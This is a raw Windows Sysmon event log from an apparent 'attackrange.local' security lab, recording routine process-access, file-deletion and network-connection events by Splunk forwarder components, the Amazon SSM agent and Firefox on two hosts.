08:01:36.519{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083426Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083425Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083424Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083423Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083422Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083421Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B4E0-615A-9401-00000000FD01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083420Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.519{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4E0-615A-9401-00000000FD01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083419Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:36.520{2FDD8D40-B4E0-615A-9401-00000000FD01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083435Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:37.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3956A305239732663A8F0E3758EF0388,SHA256=CEF8DD71517F092D79DDC870E3D60864579E7C303A302E8850B27524A10F1E30,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107339Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:36.474{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51881-false10.0.1.12-8000- 23542300x8000000000000000107338Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:37.566{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-033MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107337Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:37.147{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAC37A79832163E940C95497F7C51F96,SHA256=F4D6ACC2C19A487DC164B485AC96CA6FA84CD28035D55C4E420E4B45C43E5AB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083434Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:37.004{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A94318706676EE9D5B53DCF1ACEAE2B5,SHA256=29028F7AA4CE7F841931632F70CA6B9381E42B191AB4EBA3C37F4EFA2CC40796,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083436Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:38.816{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1669DB4352AC773D1E65DF33B1F1A68B,SHA256=9785410D8F7BEE2FFA76DE6905947762038779B3688F9919329D71B08E0719BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107341Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:38.565{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-034MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107340Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:38.148{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=905E45D5A2B7BC848FAF2DF3CC361654,SHA256=642A330945503EB488F971CBAB9EDA134C94E9BEC1C2615594C7496D5BE83CEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083438Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:39.988{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E40A057F88642F3F978969836ABB4141,SHA256=4C25E1E2CB10DAA07B6FD30BF8F167462509A6807868B67174EA4F114228EE93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107342Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:39.149{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D934E9625BD46887855D5372DD1E8E69,SHA256=8367E7FEB4C0CC122246DA70EB486CB3E64EA9B442DFBCA9DAD26CC66C98CF85,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083437Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:37.590{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50167-false10.0.1.12-8000- 23542300x8000000000000000107343Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:40.163{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=078AA4412220E2864AF801D4157B5B71,SHA256=C814D687882AE01E6394F7CEE7ACEFD6AF732B418CE827AB0A4FFB345B745837,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107344Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:41.163{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91338CF5602550DB0DE2696535E66647,SHA256=BCE3B3BF59F51074772C4567B8B727FBD06C9FDFA4A458BD6AEAE79E4B3505D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083439Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:41.004{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CDF51B70CF59C1749BE73CCED1C5B43,SHA256=63E061C8906773DFA334C6CB7CA02ACFE3EDFC82D5EEFED52AC9600F14A1B735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083440Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:42.004{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D4AC10567AE50B8245F4D977110A75D,SHA256=5C6FFF73F1C7E2F8D88D8A34B87E086A434578EDB537C1FE844E0150A41C856D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107345Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:42.194{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F3018D23C30C12B4F3766D390C7FDAF,SHA256=ADB1549230D027CC65396FA0CDFB1AE8451696CCA917702BF9930FDF7C9171A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083441Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:43.082{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D401818C1D50DB8579914C2B019DE7F,SHA256=99A0DF0381DB4FECC5976E1CA2112BB4B357AE9068E395DFDBF5EF12EB205F65,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107347Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:42.374{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51882-false10.0.1.12-8000- 23542300x8000000000000000107346Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:43.195{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF90F1D87F879316084D390B56A5413F,SHA256=8FF1961BC9F479B4CF5A94BAAECF4610E56BB93FF38ADEECB61372D12EE67C0E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083443Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:42.653{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50168-false10.0.1.12-8000- 23542300x800000000000000083442Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:44.160{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E84633BD166CCD87AED706E298E3BA4D,SHA256=15225852FF61D7D4D77BCF9D23ECED81C8A2D32080339D3B9A723F06E3DE0D28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107348Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:44.201{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B0906748620E778F5583EA95BDAFE2D,SHA256=4063BA927E9618CB15413BA334B6020F7D3466BB33F20A50E6DCFEBAAAF507C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107349Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:45.218{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98271D0CC476A939C73C23FC8BFFBD82,SHA256=93220C43DB2FF6D5766A4AA4DCF63CBBEE5B640967C8C769EBA94B7F413B79FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083444Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:45.191{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CB8FD58B7011E90E3E09389460C476B,SHA256=39B9AC28C8789B83CDEE39FDAC07A56DBDEA2360D5D417351BB0FF79A6F2E9C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107350Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:46.240{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E397F4518158C672EFD37A9AD82845FD,SHA256=52CFB1DDD296EB8A4E4F06C18B300C3FE62BBB4FEE426A18CFE13FDBB80AC9D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083445Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:46.207{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=236ABF7FE4E7C57AE5790AF6EB48A02B,SHA256=B4866893DA97C91B67A9AA8607FFFB5F197CCAC8F955FEB9D6D7E8AE74048C99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083446Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:47.207{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=502F2CFF9345639D04FE91707E7227A5,SHA256=255C0E9C60358F92F599191AFD2F3D27E0B1C7BB888B57736DBBAF04D8DFD7D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107351Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:47.243{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF8CD50A37B428AA5F1F983709658760,SHA256=A331C06111448B1C8B3DFE4BE148823E906007AA06A6FCC5D2B8C1ADF14BFF8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083447Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:48.348{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=175E38065EACDD9F6E68DF73637451E6,SHA256=CE3663F4F41B65E420F02375848048081E42746A95FAA840FEE7A83B17CBD9A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107372Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.990{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Local\Temp\tmpaddon-4e5b8MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107371Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.966{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107370Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.779{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\31432MD5=E39A657B41416AC8A6516AF29AF8A479,SHA256=D52C52FA4402B023DA767A1EEB9FA9DDBDB1CD4527284890DEF24428D53BC254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107369Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.725{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107368Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:48.725{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 